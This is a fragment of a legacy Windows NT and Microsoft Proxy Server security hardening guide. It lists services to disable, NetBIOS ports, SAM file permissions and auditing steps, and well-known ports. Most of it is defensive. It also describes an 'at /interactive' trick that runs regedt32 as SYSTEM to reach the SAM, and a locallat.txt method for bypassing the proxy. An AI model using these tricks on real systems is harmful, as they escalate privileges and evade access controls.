        <w:tab/>
        <w:tab/>
        <w:t>Administrators: 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 Full Control</w:t>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utoexec.bat, \Config.sys</w:t>
        <w:tab/>
        <w:t>Everybody: Re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ministrators: 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 Full Control</w:t>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MP directory</w:t>
        <w:tab/>
        <w:t>Administrators: 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 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REATOR OWNER: Full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veryone: Special Directory Access - Read, Write and Execute, Special File Access - None </w:t>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view these files in File Manager, choose the By File Type command from the View menu, then select the Show Hidden/System Files check box in the By File Type dialog bo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at the protections mentioned here are over and above those mentioned earlier in the standard security level section, which included having only NTFS partitions (except the boot partition in case of RISC machines).  The FAT boot partition for RISC systems can be configured using the Secure System Partition command on the Partition menu of the Disk Administrator utilit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is also highly advisable that Administrators manually scan the permissions on various partitions on the system and ensures that they are appropriately secured for various user accesses in their environ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2] Services and NetBIOS Access From Inter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a stand-alone WEB or firewall server, consider the following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llowing services should NOT be star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ice</w:t>
        <w:tab/>
        <w:t>Installed</w:t>
        <w:tab/>
        <w:t>Not Installed</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erter</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lipBook Server</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puter Browser</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HCP Client</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irectory Replicator</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ssenger</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Logon</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work DDE</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work DDE DSDM</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lug and Play</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mote Procedure Call (RPC) Locator</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er</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NMP Trap Service</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pooler "unless print spooling is needed"</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CP/IP NetBIOS Helper</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lephony Service</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orkstation</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llowing services MUST be star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ice</w:t>
        <w:tab/>
        <w:t>Installed</w:t>
        <w:tab/>
        <w:t>Not Installed</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ventLog</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TP Publishing Service (for FTP server)</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opher Publishing Service (for Gopher server)</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T LM Security Support Provider</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mote Procedure Call (RPC) Service</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NMP</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orld Wide Web Publishing Service (for WWW server)</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llowing services MAY be started if need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ice</w:t>
        <w:tab/>
        <w:t>Installed</w:t>
        <w:tab/>
        <w:t>Not Installed</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chedule</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PS</w:t>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isconnect the "NetBIOS Interface", the "Server" and the "Workstation" from the "WINS Client(TCP/I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6.3.3] Alerter and Messenger Servic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Windows NT alerter and messenger services enable a user to send pop-up messages to other users. A network administrator may consider this an unnecessary risk due to the fact that these types of services have been known to be used in social engineering attacks. Some users might actually respond to a request to change their password, create a share, or otherwise open holes in the network. A side effect of running this service is that it causes the name of the current user to be broadcast in the NetBIOS name table, which gives the attacker a valid user name to use in brute force attemp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6.3.4] Unbind Unnecessary Services from Your Internet Adapter Ca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Bindings feature in the Network application in Control Panel to unbind any unnecessary services from any network adapter cards connected to the Internet. For example, you might use the Server service to copy new images and documents from computers in your internal network, but you might not want remote users to have direct access to the Server service from the Intern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you need to use the Server service on your private network, disable the Server service binding to any network adapter cards connected to the Internet. You can use the Windows NT Server service over the Internet; however, you should fully understand the security implications and comply with Windows NT Server Licensing requirements issu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you are using the Windows NT Server service you are using Microsoft networking (the server message block [SMB] protocol rather than the HTTP protocol) and all Windows NT Server Licensing requirements still apply. HTTP connections do not apply to Windows NT Server licensing requiremen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Windows NT systems with direct Internet connectivity and have NetBios, there are two configuration op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ab/>
        <w:t>Configure the NT system on the Internet outside the corporate firewall. You can also accomplish this by blocking ports 135, 137 and 138 on TCP and UDP protocols at the firewall.  This ensures that no NetBIOS traffic moves across the corporate firew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ab/>
        <w:t>Configure the protocol bindings between TCP/IP, NetBIOS, Server and Workstation services using the network control panel.  By removing the bindings between NetBIOS and TCP/IP, the native file sharing services (using the Server and Workstation services) will not be accessible via TCP/IP and hence the Internet.  These and other NetBIOS services will still be accessible via a local LAN-specific, non-routable protocol (ex: NetBEUI) if one is in place.  To accomplish this use the Network Control Panel applet.  Select the Bindings Tab and disable the NetBios bindings with TCP/IP protocol st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Windows NT system with direct Internet connectivity needs to be secured with respect to other services besides NetBIOS access, specifically Internet Information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BIOS over TCP/IP should normally be disabled for a firewall or web server.  The following is a list of the ports used by NB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NetBIOS-ns 137/tcp NETBIOS Name Servi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NetBIOS-ns 137/udp NETBIOS Name Servi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NetBIOS-dgm 138/tcp NETBIOS Datagram Servi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NetBIOS-dgm 138/udp NETBIOS Datagram Servi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NetBIOS-ssn 139/tcp NETBIOS Session Servi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NetBIOS-ssn 139/udp NETBIOS Session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5] Enhanced Protection for Security Accounts Manager Databa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Windows NT Server 4.0 System Key hotfix (included in Service Pack 3) provides the capability to use strong encryption techniques to increase protection of account password information stored in the registry by the Security Account Manager (SAM). Windows NT Server stores user account information, including a derivative of the user account password, in a secure portion of the Registry protected by access control and an obfuscation function. The account information in the Registry is only accessible to members of the Administrators group. Windows NT Server, like other operating systems, allows privileged users who are administrators access to all resources in the system. For installations that want enhanced security, strong encryption of account password derivative information provides an additional level of security to prevent Administrators from intentionally or unintentionally accessing password derivatives using Registry programming interfac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lease refer to Knowledge Base article Q143475 for more details on SysKey feature and how it can be implemented on a Windows NT install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6] Disable Caching of Logon Credentials during interactive log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default configuration of Windows NT caches the last logon credentials for a user who logged on interactively to a system.  This feature is provided for system availability reasons such as the user's machine is disconnected or none of the domain controllers are onl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ven though the credential cache is well protected, in a highly secure environments, customers may want to disable this feature.  This can be done by setting the following registry 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ve:</w:t>
        <w:tab/>
        <w:t>HKEY_LOCAL_MACHIN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w:t>
        <w:tab/>
        <w:t>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</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CachedLogonsCount</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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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ue:</w:t>
        <w:tab/>
        <w:t>0</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7] How to secure the %systemroot%\repair\sam._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ompleted</w:t>
        <w:tab/>
        <w:t>Not implemented</w:t>
        <w:tab/>
        <w:t>Not applicab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w:t>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By default, the SAM._ file and \repair directory has the following permission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dministrators: Full Contro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veryone: Rea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YSTEM: Full Contro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ower Users: Chan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From within Explorer, highlight the SAM._ file, right click, choose properties, security, permissions. Remove all privilege from this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From a DOS prompt, execute the follow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acls %systemroot%\repair\sam._ /D Every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will deny the group Everyone permission to the file, ensuring that no other permission (i.e. inherited permissions from a share) can override the file permi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Whenever you need to update your ERD, first execute the following from a DOS promp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acls %systemroot%\repair\sam._ /T /G Administrators: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will grant Administrators change permission to update it during the ERD upda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Once the ERD has been updated, execute the following from a DOS promp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acls %systemroot%\repair\sam._ /E /R Administrato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will once again remove the permissions for Administrato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ow to enable auditing on password registry key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First you have to make sure auditing is enabled. Start User Manager, Policies, Audit, and click "Audit These Ev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2.By default, Windows NT does not identify any users or groups to audit on any objects within the system. Auditing can add performance overhead to your system depending on the available resources, so care should be taken in determining what and whom to audit. For a full description of auditing in Windows NT, I recommend the Microsoft Press book "Windows NT 3.5 - Guidelines for Security, Audit, and Control", ISBN 1-55615-814-9. Despite its title it is still the most comprehensive coverage of auditing that I have read. For the sake of this example, we will simply check every Success and Failure checkbox.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3.Close the dialo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Now for a little known trick. While logged on as Administrator, ensure that the Schedule service is set to start up as the System account. Once set, start the Schedule servi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Check the time, and then open a DOS prompt. At the DOS prompt, type in the following; at 22:48 /interactive "regedt32.exe" where 22:48 gets replaced with the current time plus 1 minute (or 2 or whatever amount of time you think it will take you to type in the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6.At the designated time, regedt32.exe will fire up and appear on your desktop. This incarnation of regedt32.exe will be running in the security context of the user SYSTEM. As such, you will be able to see the entire registry, every key within the SAM or Security trees. BE VERY CAREFUL HERE. It is important to note that when running an application as SYSTEM, it does so attempting to use null session for credentials. Null session support has been disabled by default in all versions of Windows NT after 3.1, therefore any attempt to connect to non-local resources as this security context will fail. An Administrator could enable null session support through the registry, but such a configuration is strongly discourag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7.All we want to do is enable auditing on the designated keys, nothing else. To this end, we highlight the HKEY_LOCAL_MACHINE windows within regedt32. Next highlight the SAM tree. Choose the Security menu item, then Audit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Click on the Add button and choose Show Us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I'm going to recommend that you add the SYSTEM user, the group Domain Admins, and the user Administrator. You want to cover any account which has the right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ake ownership of files or other objec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Back up files and directo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Manage auditing and security lo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Restore files and directo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dd workstations to do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Replace a process level toke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0.Click the Audit Permission on Existing Subkey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Next, click in the Success and Failure checkboxes for the following entries; - Query Value - Set Value - Write DAC - Read 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Choose OK, and then Y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Repeat the process for the Security tr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4.Close REGEDT32, and stop the Schedule service. You will want to set the Schedule service to use a userID for startup which you create, rather than SYSTEM, in future. Take this opportunity to create such a user and change the startup for Schedu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will now have applied auditing to the entire SAM ensuring you'll be notified via the Event Logger of any failed or successful access to your sensitive information by the only accounts which have the ability to access such information. The issue of what to do when/if you discover event notifications is beyond the scope of this document. Part of a good security policy is an appropriate audit policy which would dictate how the event logs are reviewed, how the information is verified, and what actions should be taken for each possible ev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3.8] TCP/IP Security in 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is section is not meant to teach you the concepts behind the TCP/IP protocol. It is assumed that a working knowledge of TCP/IP can be appli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Windows NT has a built in TCP/IP security functionality that most people do not use or know about. This functionality enables you to control the types of network traffic that can reach your NT servers. Access can be allowed or denied based on specific TCP ports, UDP ports, and IP protocols. This type of security is normally applied to servers connected directly to the internet, which is not recommend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Do configure NT's built in TCP/IP security, follow these ste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1 - Right click on Network Neighborhood and goto the properties o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2 - Select the Protocols tab, highlight TCP/IP and click on Propert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3 - Select the IP address tab of the TCP/IP properties scre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4 - Check the check box that reads "Enable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5 - Click on Config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You should now be looking at the TCP/IP Security dialog, which has the following op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dapter: Specifies which of the installed network adapter cards you are configur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TCP Por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UDP Por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IP Protoco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Within these settings, you would choose which ports and what access permissions you would like to assign to those ports. The following list is a list of the well known TCP/IP ports. This is not an in depth guide, just a quick reference (For more details, check RFC 106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6.3.9] Well known TCP/UDP Port numbe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ervice                Port           Commen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CP Por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echo            </w:t>
        <w:tab/>
        <w:t>7/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discard       </w:t>
        <w:tab/>
        <w:t>9/tcp          sink nu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ystat          </w:t>
        <w:tab/>
        <w:t>11/tcp         us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daytime         </w:t>
        <w:tab/>
        <w:t>13/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etstat         </w:t>
        <w:tab/>
        <w:t>15/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qotd            </w:t>
        <w:tab/>
        <w:t>17/tcp         quo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hargen         </w:t>
        <w:tab/>
        <w:t>19/tcp         ttytst sour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ftp-data        </w:t>
        <w:tab/>
        <w:t>20/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ftp             </w:t>
        <w:tab/>
        <w:t>21/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telnet          </w:t>
        <w:tab/>
        <w:t>23/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mtp            </w:t>
        <w:tab/>
        <w:t>25/tcp         ma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time            </w:t>
        <w:tab/>
        <w:t>37/tcp         tim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ame            </w:t>
        <w:tab/>
        <w:t>42/tcp         name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whois           </w:t>
        <w:tab/>
        <w:t>43/tcp         nic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nameserver    53/tcp         do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apts            </w:t>
        <w:tab/>
        <w:t>57/tcp         any private terminal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apfs            </w:t>
        <w:tab/>
        <w:t>59/tcp         any private file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je             </w:t>
        <w:tab/>
        <w:t>77/tcp         netrj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finger          </w:t>
        <w:tab/>
        <w:t>79/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http                 80/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link            </w:t>
        <w:tab/>
        <w:t>87/tcp         ttylin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updup          </w:t>
        <w:tab/>
        <w:t>95/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ewacct         </w:t>
        <w:tab/>
        <w:t>100/tcp        [unauthorized u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hostnames     101/tcp        host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iso-tsap        </w:t>
        <w:tab/>
        <w:t>102/tcp        tsa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x400            </w:t>
        <w:tab/>
        <w:t>103/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x400-snd        </w:t>
        <w:tab/>
        <w:t>104/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snet-ns        </w:t>
        <w:tab/>
        <w:t>105/tcp        CSNET Name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pop-2           </w:t>
        <w:tab/>
        <w:t>109/tcp        Post Office Protocol version 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op-3              110/tcp        Post Office Protocol version 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unrpc          </w:t>
        <w:tab/>
        <w:t>111/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auth            </w:t>
        <w:tab/>
        <w:t>113/tcp        authentic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ftp            </w:t>
        <w:tab/>
        <w:t>115/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uucp-path       117/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ntp            </w:t>
        <w:tab/>
        <w:t>119/tcp        usenet readnews unt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tp             </w:t>
        <w:tab/>
        <w:t>123/tcp        network time protoc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tatsrv         </w:t>
        <w:tab/>
        <w:t>133/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profile         </w:t>
        <w:tab/>
        <w:t>136/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eWS            </w:t>
        <w:tab/>
        <w:t>144/tcp        ne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print-srv       </w:t>
        <w:tab/>
        <w:t>170/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https               443/tcp        Secure HTT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exec            </w:t>
        <w:tab/>
        <w:t>512/tcp        remote process execu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uthentication performed us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asswords and UNIX loppgin na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login          </w:t>
        <w:tab/>
        <w:t>513/tcp        remote login a la tel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utomatic authentication perform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based on priviledged port numb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nd distributed data bases whi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dentify "authentication domai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md             </w:t>
        <w:tab/>
        <w:t>514/tcp        like exec, but automat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uthentication is performed as f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ogin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printer         </w:t>
        <w:tab/>
        <w:t>515/tcp        spool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efs             </w:t>
        <w:tab/>
        <w:t>520/tcp        extended file name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tempo           </w:t>
        <w:tab/>
        <w:t>526/tcp        newd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ourier         </w:t>
        <w:tab/>
        <w:t>530/tcp        rp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onference      </w:t>
        <w:tab/>
        <w:t>531/tcp        c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etnews         </w:t>
        <w:tab/>
        <w:t>532/tcp        readne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uucp            </w:t>
        <w:tab/>
        <w:t>540/tcp        uucp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klogin          </w:t>
        <w:tab/>
        <w:t>543/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kshell          </w:t>
        <w:tab/>
        <w:t>544/tcp        krcm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dsf             </w:t>
        <w:tab/>
        <w:t>555/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emotefs        </w:t>
        <w:tab/>
        <w:t>556/tcp        rfs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hshell         </w:t>
        <w:tab/>
        <w:t>562/tcp        chcm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meter           </w:t>
        <w:tab/>
        <w:t>570/tcp        dem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pcserver        </w:t>
        <w:tab/>
        <w:t>600/tcp        Sun IPC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qs             </w:t>
        <w:tab/>
        <w:t>607/tcp        nq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mdqs            </w:t>
        <w:tab/>
        <w:t>666/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file           </w:t>
        <w:tab/>
        <w:t>750/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pump            </w:t>
        <w:tab/>
        <w:t>751/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qrh             </w:t>
        <w:tab/>
        <w:t>752/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rh             </w:t>
        <w:tab/>
        <w:t>753/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tell            </w:t>
        <w:tab/>
        <w:t>754/tcp        se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login          </w:t>
        <w:tab/>
        <w:t>758/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on             </w:t>
        <w:tab/>
        <w:t>759/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s              </w:t>
        <w:tab/>
        <w:t>760/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xe             </w:t>
        <w:tab/>
        <w:t>761/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quotad          </w:t>
        <w:tab/>
        <w:t>762/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ycleserv       </w:t>
        <w:tab/>
        <w:t>763/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omserv          </w:t>
        <w:tab/>
        <w:t>764/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webster         </w:t>
        <w:tab/>
        <w:t>765/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phonebook      </w:t>
        <w:tab/>
        <w:t>767/tcp        ph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vid             </w:t>
        <w:tab/>
        <w:t>769/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tip            </w:t>
        <w:tab/>
        <w:t>771/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ycleserv2      </w:t>
        <w:tab/>
        <w:t>772/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ubmit          </w:t>
        <w:tab/>
        <w:t>773/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passwd         </w:t>
        <w:tab/>
        <w:t>774/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entomb          </w:t>
        <w:tab/>
        <w:t>775/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wpages          </w:t>
        <w:tab/>
        <w:t>776/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wpgs            </w:t>
        <w:tab/>
        <w:t>780/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mdbs     </w:t>
        <w:tab/>
        <w:t>800/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device          </w:t>
        <w:tab/>
        <w:t>801/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maitrd          </w:t>
        <w:tab/>
        <w:t>997/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busboy          </w:t>
        <w:tab/>
        <w:t>998/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garcon          </w:t>
        <w:tab/>
        <w:t>999/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blackjack       </w:t>
        <w:tab/>
        <w:t>1025/tcp       network blackj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bbn-mmc        1347/tcp       multi media conferenc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bbn-mmx        1348/tcp       multi media conferenc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orasrv          </w:t>
        <w:tab/>
        <w:t>1525/tcp       orac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ingreslock      </w:t>
        <w:tab/>
        <w:t>1524/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issd            </w:t>
        <w:tab/>
        <w:t>1600/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kd             </w:t>
        <w:tab/>
        <w:t>1650/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dc              </w:t>
        <w:tab/>
        <w:t>2001/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mailbox         </w:t>
        <w:tab/>
        <w:t>2004/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berknet         </w:t>
        <w:tab/>
        <w:t>2005/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invokator       </w:t>
        <w:tab/>
        <w:t>2006/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dectalk         </w:t>
        <w:tab/>
        <w:t>2007/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onf            </w:t>
        <w:tab/>
        <w:t>2008/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ews            </w:t>
        <w:tab/>
        <w:t>2009/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earch          </w:t>
        <w:tab/>
        <w:t>2010/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aid-cc         </w:t>
        <w:tab/>
        <w:t>2011/tcp       rai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ttyinfo         </w:t>
        <w:tab/>
        <w:t>2012/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aid-am         </w:t>
        <w:tab/>
        <w:t>2013/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troff           </w:t>
        <w:tab/>
        <w:t>2014/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ypress         </w:t>
        <w:tab/>
        <w:t>2015/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cypress-stat   2017/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terminaldb      </w:t>
        <w:tab/>
        <w:t>2018/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hosockami   2019/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ervexec        </w:t>
        <w:tab/>
        <w:t>2021/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down            </w:t>
        <w:tab/>
        <w:t>2022/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ellpack         </w:t>
        <w:tab/>
        <w:t>2025/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hadowserver   2027/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ubmitserver </w:t>
        <w:tab/>
        <w:t>2028/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device2         </w:t>
        <w:tab/>
        <w:t>2030/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blackboard     </w:t>
        <w:tab/>
        <w:t>2032/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glogger         </w:t>
        <w:tab/>
        <w:t>2033/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coremgr       </w:t>
        <w:tab/>
        <w:t>2034/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imsldoc         </w:t>
        <w:tab/>
        <w:t>2035/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objectmanager 2038/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lam             </w:t>
        <w:tab/>
        <w:t>2040/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interbase       </w:t>
        <w:tab/>
        <w:t>2041/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isis            </w:t>
        <w:tab/>
        <w:t>2042/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imsl           </w:t>
        <w:tab/>
        <w:t>2044/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dls             </w:t>
        <w:tab/>
        <w:t>2047/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dls-monitor     </w:t>
        <w:tab/>
        <w:t>2048/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hilp           </w:t>
        <w:tab/>
        <w:t>2049/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SWS            </w:t>
        <w:tab/>
        <w:t>3049/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fa             </w:t>
        <w:tab/>
        <w:t>4672/tcp       remote file access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omplexmain   </w:t>
        <w:tab/>
        <w:t>5000/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omplexlink   </w:t>
        <w:tab/>
        <w:t>5001/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padl2sim        </w:t>
        <w:tab/>
        <w:t>5236/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man             </w:t>
        <w:tab/>
        <w:t>9535/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UDP Por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echo            </w:t>
        <w:tab/>
        <w:t>7/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discard         </w:t>
        <w:tab/>
        <w:t>9/udp          sink nu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ystat          </w:t>
        <w:tab/>
        <w:t>11/udp         us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daytime         </w:t>
        <w:tab/>
        <w:t>13/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etstat         </w:t>
        <w:tab/>
        <w:t>15/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qotd            </w:t>
        <w:tab/>
        <w:t>17/udp         quo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hargen         </w:t>
        <w:tab/>
        <w:t>19/udp         ttytst sour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time            </w:t>
        <w:tab/>
        <w:t>37/udp         tim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lp             </w:t>
        <w:tab/>
        <w:t>39/udp         resour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ame            </w:t>
        <w:tab/>
        <w:t>42/udp         name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whois           </w:t>
        <w:tab/>
        <w:t>43/udp         nic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ameserver   </w:t>
        <w:tab/>
        <w:t>53/udp         do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bootps          </w:t>
        <w:tab/>
        <w:t>67/udp         boot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bootpc          </w:t>
        <w:tab/>
        <w:t>68/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tftp            </w:t>
        <w:tab/>
        <w:t>69/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unrpc          </w:t>
        <w:tab/>
        <w:t>111/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erpc            </w:t>
        <w:tab/>
        <w:t>121/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tp             </w:t>
        <w:tab/>
        <w:t>123/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tatsrv         </w:t>
        <w:tab/>
        <w:t>133/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profile         </w:t>
        <w:tab/>
        <w:t>136/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nmp            </w:t>
        <w:tab/>
        <w:t>161/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nmp-trap      </w:t>
        <w:tab/>
        <w:t>162/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at-rtmp         </w:t>
        <w:tab/>
        <w:t>201/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at-nbp          </w:t>
        <w:tab/>
        <w:t>202/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at-3            </w:t>
        <w:tab/>
        <w:t>203/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at-echo         </w:t>
        <w:tab/>
        <w:t>204/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at-5            </w:t>
        <w:tab/>
        <w:t>205/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at-zis          </w:t>
        <w:tab/>
        <w:t>206/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at-7            </w:t>
        <w:tab/>
        <w:t>207/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at-8            </w:t>
        <w:tab/>
        <w:t>208/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biff            </w:t>
        <w:tab/>
        <w:t>512/udp        used by mail system to notify us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of new mail received; current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receives messages only fr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rocesses on the same mach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who             </w:t>
        <w:tab/>
        <w:t>513/udp        maintains data bases showing who'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ogged in to machines on a loc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net and the load average of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mach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yslog          </w:t>
        <w:tab/>
        <w:t>514/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talk            </w:t>
        <w:tab/>
        <w:t>517/udp        like tenex link, but acro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machine - unfortunately, does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use link protocol (this is actual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just a rendezvous port from which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cp connection is establish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talk           </w:t>
        <w:tab/>
        <w:t>518/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utime           </w:t>
        <w:tab/>
        <w:t>519/udp        unix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outer          </w:t>
        <w:tab/>
        <w:t>520/udp        local routing process (on si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uses variant of Xerox NS rou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nformation protoc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timed           </w:t>
        <w:tab/>
        <w:t>525/udp        time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etwall         </w:t>
        <w:tab/>
        <w:t>533/udp        for emergency broadca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ew-rwho        </w:t>
        <w:tab/>
        <w:t>550/udp        new-wh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monitor        </w:t>
        <w:tab/>
        <w:t>560/udp        rmonit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monitor         </w:t>
        <w:tab/>
        <w:t>561/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meter           </w:t>
        <w:tab/>
        <w:t>571/udp        udem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elcsd           </w:t>
        <w:tab/>
        <w:t>704/udp        errlog copy/server daem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loadav          </w:t>
        <w:tab/>
        <w:t>750/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vid             </w:t>
        <w:tab/>
        <w:t>769/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adlock         </w:t>
        <w:tab/>
        <w:t>770/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otify          </w:t>
        <w:tab/>
        <w:t>773/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cmaint_dbd     774/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cmaint_trnsd  775/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wpages          </w:t>
        <w:tab/>
        <w:t>776/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puparp          </w:t>
        <w:tab/>
        <w:t>998/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applix          </w:t>
        <w:tab/>
        <w:t>999/udp        Applix a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puprouter       </w:t>
        <w:tab/>
        <w:t>999/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adlock         </w:t>
        <w:tab/>
        <w:t>1000/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hermes          </w:t>
        <w:tab/>
        <w:t>1248/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wizard          </w:t>
        <w:tab/>
        <w:t>2001/udp       cur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globe           </w:t>
        <w:tab/>
        <w:t>2002/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emce            </w:t>
        <w:tab/>
        <w:t>2004/udp       CCWS mm con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oracle          </w:t>
        <w:tab/>
        <w:t>2005/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aid-cc         </w:t>
        <w:tab/>
        <w:t>2006/udp       rai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aid-am         </w:t>
        <w:tab/>
        <w:t>2007/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terminaldb      </w:t>
        <w:tab/>
        <w:t>2008/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hosockami      2009/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pipe_server     </w:t>
        <w:tab/>
        <w:t>2010/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ervserv        </w:t>
        <w:tab/>
        <w:t>2011/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aid-ac         </w:t>
        <w:tab/>
        <w:t>2012/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aid-cd         </w:t>
        <w:tab/>
        <w:t>2013/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aid-sf         </w:t>
        <w:tab/>
        <w:t>2014/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aid-cs         </w:t>
        <w:tab/>
        <w:t>2015/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bootserver      </w:t>
        <w:tab/>
        <w:t>2016/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bootclient      </w:t>
        <w:tab/>
        <w:t>2017/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ellpack        </w:t>
        <w:tab/>
        <w:t>2018/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about           </w:t>
        <w:tab/>
        <w:t>2019/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xinupagesrver  </w:t>
        <w:tab/>
        <w:t>2020/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xinuexpnsion1  2021/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xinuexpnsion2  2022/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xinuexpnsion3  2023/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xinuexpnsion4  2024/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xribs           </w:t>
        <w:tab/>
        <w:t>2025/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crabble        </w:t>
        <w:tab/>
        <w:t>2026/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isis            </w:t>
        <w:tab/>
        <w:t>2042/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isis-bcast      </w:t>
        <w:tab/>
        <w:t>2043/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imsl           </w:t>
        <w:tab/>
        <w:t>2044/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cdfunc          </w:t>
        <w:tab/>
        <w:t>2045/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dfunc          </w:t>
        <w:tab/>
        <w:t>2046/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dls             </w:t>
        <w:tab/>
        <w:t>2047/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hilp           </w:t>
        <w:tab/>
        <w:t>2049/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montor_scure </w:t>
        <w:tab/>
        <w:t>5145/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xdsxdm          </w:t>
        <w:tab/>
        <w:t>6558/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isode-dua       </w:t>
        <w:tab/>
        <w:t>17007/ud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0] Preface to Microsoft Proxy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section was not made for people who have been working with Microsoft Proxy Server since its beta (catapult) days. It is made for individuals who are curious about the product and security professionals that are curious as to what Microsoft Proxy Server has to offer. This section is also being written for individuals have a general idea of what a Proxy Server does, but wants to know more. This section goes into discussion of Proxy Server Features and Architecture, Access Control, Encryption, and Firewall Strategies (which I have been getting a lot of requests f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econd part of the documentation goes into Firewall types and strategies, so if that's the reason you downloaded the documentation, go straight to page 8 I belie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1] What is Microsoft Proxy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icrosoft Proxy Server is a "firewall" and cache server. It provides additional Internet security and can improve network response issues depending on its configuration. The reason I put the word firewall in quotes is because Proxy Server should not be considered as a stand-alone solution to a firewall need. When you are done reading this document, you will have an advanced understanding of the Proxy Server product and also understand firewall techniques and topologi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xy Server can be used as an inexpensive means to connect an entire business through only one valid IP address. It can also be used to allow more secure inbound connections to your internal network from the Internet. By using Proxy Server, you are able to better secure your network against intrusion. It can be configured to allow your entire internal private network to access resources on the Internet, at the same time blocking any inbound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roxy Server can also be used to enhance the performance of your network by using advanced caching techniques. The can be configured to save local copies of requested items from the Internet. The next time that item is requested, it can be retrieved from the cache without having to connect to the original source. This can save an enormous amount of time and network bandwidth.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ike Proxy Server 1.0, Proxy Server 2.0 includes packet filtering and many other features that we will be discuss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xy Server provides it functionality by using three serv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Web Proxy: The web proxy service supports HTTP, FTP, and Gopher for TCP/IP Cli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WinSock Proxy: The Winsock proxy supports Windows Sockets client applications. It provides support for clients running either TCP/IP or IPX/SPX. This allows for networks that may be running more of a Novell environment to still take advantage of Proxy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SOCKS Proxy: The SOCKS Proxy is a cross-platform service that allows for secure communication in a client/server capacity. This service supports SOCKS version 4.3a and allows users access to the Internet by means of Proxy Server. SOCKS extends the functionality provided by the WinSock service to non-Windows platforms such as Unix or Macintosh.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2] Proxy Servers Security Featur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conjunction with other products, Proxy Server can provide firewall level security to prevent access to your internal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Single Contact Point: A Proxy Server will have two network interfaces. One of these network interfaces will be connected to the external (or "untrusted") network, the other interface will be connected to your internal (or "trusted") network. This will better secure your LAN from potential intrude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Protection of internal IP infrastructure: When IP forwarding is disabled on the Proxy Server, the only IP address that will be visible to the external environment will be the IP address of the Proxy Server. This helps in preventing intruders from finding other potential targets on your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Packet Layer Filtering: Proxy Server adds dynamic packet filtering to its list of features. With this feature, you can block or enable reception of certain packet types. This enables you to have a tremendous amount of control over your network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3] Beneficial Features of Prox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IIS and NT Integration: Proxy Server integrates with Windows NT and Internet Information Server tighter than any other package available on the market. Proxy Server actually uses the same administrative interface used by Internet Information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Bandwidth Utilization: Proxy Server allows all clients in your network to share the same link to the external network. In conjunction with Internet Information Server, you can set aside a certain portion of your bandwidth for use by your webserver serv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aching Mechanisms: Proxy Server supports both active and passive caching. These concepts will be explained in better detail further into the docu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upport for Web Publishing: Proxy Server uses a process known as reverse proxy to provide security while simultaneously allowing your company to publish on the Internet. Using another method known as reverse hosting, you can also support virtual servers through Prox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4] Hardware and Software Requirem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icrosoft suggests the following minimum hardware requirem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Intel 486 or higher. RISC support is also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24 MB Ram for Intel chips 32 MB Ram for RIS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10 MB Diskspace needed for installation. 100 MB + .5 MB per client for Cache spa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2 Network interfaces (Adapters, Dial-Up, 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llowing is the suggested minimum software requirem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Windows NT server 4.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Internet Information Server 2.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ervice Pack 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CP/I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is highly recommended that it be installed on an NTFS partition. If a NTFS partition is not used, not only are you losing NTFS's advanced security features, but also the caching mechanisms of Proxy Server will not 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is also recommended that your two network interfaces be configured prior to installation. On interface configured to the external network, and one configured for the internal network. (Note: When configuring your TCP/IP settings, DO NOT configure a default gateway entry for your internal network interfa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Be sure that "Enable IP Forwarding" is not checked in your TCP/IP settings. This could seriously compromise your internal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5] What is the L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s probably one of the most common questions I am asked as a security professional. The LAT, or Local Address Table, is a series of IP address pairs that define your internal network. Each pair defines a range of IP addresses or a single pai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at LAT is generated upon installation of Proxy Server. It defines the internal IP addresses. Proxy Server uses the Windows NT Routing Table to auto-generate the LAT. It is possible that the when the LAT is auto-generated, that errors in the LATs construction will be found. You should always manually comb through the LAT and check for errors. It is not uncommon to find external IP addresses in the LAT, or entire subnets of your internal IP addresses will not appear on the LAT. It is generally a good idea to have all of your internal IP addresses in the L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NO EXTERNAL IP ADDRESSES SHOULD APPEAR IN YOUR L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pon installing the Proxy Server client software, it adds a file named msplat.txt into the \Mspclnt directory. The msplat.txt file contains the LAT. This file is regularly updated from the server to ensure that the LAT the client is using is curr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6] What is the LAT used f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very time a client attempts to use a Winsock application to establish a connection, the LAT is referenced to determine if the IP address the client is attempting to reach is internal or external. If the IP address is internal, Proxy Server is bypassed and the connection is made directly. If the IP address the client is attempting to connect to DOES NOT appear in the LAT, it is determined that the IP address is remote and the connection is made through Proxy Server. By knowing this information, someone on your internal network could easily edit his or her LAT table to bypass Proxy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me Administrators may not see this as a problem because the LAT is regularly updated from the server, so any changes the user made to his or her LAT will be overwritten. However, if the user saves their LAT with the filename Locallat.txt, the client machine will reference both the msplat.txt and the locallat.txt to determine if an IP address is local or remote. So, by using the locallat.txt method, a user can, in theory, permanently bypass Proxy Server. The locallat.txt file is never overwritten unless the user does so manual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7] What changes are made when Proxy Server is install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er side chang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he Web Proxy, Winsock Proxy, and SOCKS Proxy services are installed and management items are added into the Internet Service Manag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n HTML version of the documentation is added into the %systemroot%\help\proxy\ direc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 cache area is created on an NTFS volu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he LAT table is construc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Proxy Server Performance Monitor counters are add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lient installation and config files are added to the Msp\Clients folder. This folder is shared as Mspclnt and by default has the permissions set to Read for Every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lient side chang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he LAT (msplat.txt) file is copied to the clients local hard dri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 WSP Client icon is added to control panel on Win3.X, Win95 and WinNT cli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 Microsoft Proxy Client Program Group is add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he winsock.dll file is replace with Remote WinSock for Proxy. The old winsock file is renamed winsock.dl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Mspclnt.ini file is copied to the client mach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8] Proxy Server Architec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understand the architecture of Microsoft Proxy Server, you must first have a basic grasp of how Proxy works for outbound client requests. Here is a simple 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oe opens his browser to visit his favorite news site on the net. He types in the sites IP address which he has memorized because his visits often, instead of doing his job. The client compares the IP address Joe entered to the LAT table. Because the IP address is not found on the LAT, it is considered external. Since the client has determined that the IP address is external, it knows it must process the request through Proxy Server. The client hands Joe's request to Proxy Server. Proxy Server then checks the IP address against the access control applied by the Administrator. The Administrator has the ability to stop internal employees from visiting certain sites. Since Joe's request is not on the forbidden list applied by the Administrator, Proxy Server executes the request. Proxy contacts the website and requests the document Joe wanted. After Proxy server has received the information it requested, it stored a copy in its cache for later use and hands the request to the client machine. The website pops-up on Joe's brow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0.9] Proxy Server Services: An Introdu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WebProxy: Web Proxy normally functions with both clients and servers. As a server, it receives HTTP requests from internal network clients. As a client, it responds to internal network clients' requests by issuing their requests to a server on the Internet. The interface between the client and server components of the Web Proxy service provides chances to add value to the connections it services. By performing advanced security checks, the Web Proxy does more than relay requests between an internal client and a server on the Internet. The WebProxy service is an extensions of Internet Information Server 3.0. It consists of two following components: The Proxy Server ISAPI Filter and the Proxy Server ISAPI Application. The Web Proxy service is implemented as a 